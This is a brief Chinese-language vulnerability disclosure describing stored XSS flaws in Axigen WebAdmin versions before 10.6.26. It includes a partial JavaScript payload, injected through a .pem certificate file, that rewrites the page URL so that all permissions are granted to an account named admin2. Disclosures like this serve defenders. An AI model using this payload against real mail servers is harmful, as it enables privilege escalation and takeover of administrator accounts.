Axigen WebAdmin 界面中的多个输入字段缺乏适当的清理机制,允许执行恶意 JavaScript。这些漏洞使得低权限管理员(或利用越权访问漏洞的攻击者)能够在高权限管理员上下文中执行任意代码,从而导致完全权限提升。
受影响版本: < 10.6.26
更多信息请参见 Axigen 知识库。
我发现 3 个不同的存储型 XSS 实例:
.pem 证书文件中注入 payload。示例 Payload:
u+='&manage'+p+'=manage'+p);u+='&accessDumpData=accessDumpData&quick-add=Quick+Add&permType=manageServices&permAction=grant&servAction=grant';location.search=u">
Payload 解释:
上面展示的 payload 将为名为 admin2 的账户授予所有权限。